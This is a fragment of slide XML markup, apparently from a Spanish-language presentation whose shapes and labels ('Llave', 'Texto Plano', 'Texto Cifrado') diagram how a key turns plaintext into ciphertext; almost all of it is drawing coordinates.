                  <a:pt x="253503" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313320" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759461" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807520" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847556" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013537" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007061" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807694" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760049" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370023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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7288431" y="3881286"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="313309" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3700232" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760043" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807686" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847572" y="6477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="314702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007066" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807512" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759455" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253499" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205856" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165970" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15353" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2065120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="253499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="205856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6477" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206030" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254086" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314702" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="0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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591532" y="306164"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="4130450" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7228" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7237" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196565" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250210" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294903" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472964" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480182" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472955" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294927" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250404" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197219" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41304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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591532" y="306164"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="349738" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4130450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197217" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250400" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294923" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="351298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294899" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250206" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196564" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2495180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="0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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468194" y="1160338"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="5163947" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="139377" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468194" y="1160338"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="139377" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5163947" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="0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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661453" y="376086"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="3700232" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="314712" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254091" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206031" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165992" y="6480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15360" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="205857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="253503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6485" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205857" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253503" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313320" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759461" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807520" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847556" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013537" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007061" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807694" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760049" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370023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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661453" y="376086"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="313309" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3700232" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760043" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807686" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847572" y="6477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="314702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007066" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807512" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759455" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253499" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205856" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165970" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15353" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2065120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="253499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="205856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6477" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206030" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254086" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314702" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="0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p18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4651581" y="729613"/>
            <a:ext cx="864300" cy="0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6" name="Google Shape;226;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2076906" y="214350"/>
            <a:ext cx="26073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400">
                <a:solidFill>
                  <a:srgbClr val="FFFF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s" sz="24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Llave   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFF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400">
                <a:solidFill>
                  <a:srgbClr val="FFFF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s" sz="24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Texto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Plano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFF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7" name="Google Shape;227;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5458900" y="532200"/>
            <a:ext cx="30237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400">
                <a:solidFill>
                  <a:schemeClr val="dk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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Texto Cifrado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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8" name="Google Shape;228;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7219502" y="3811364"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
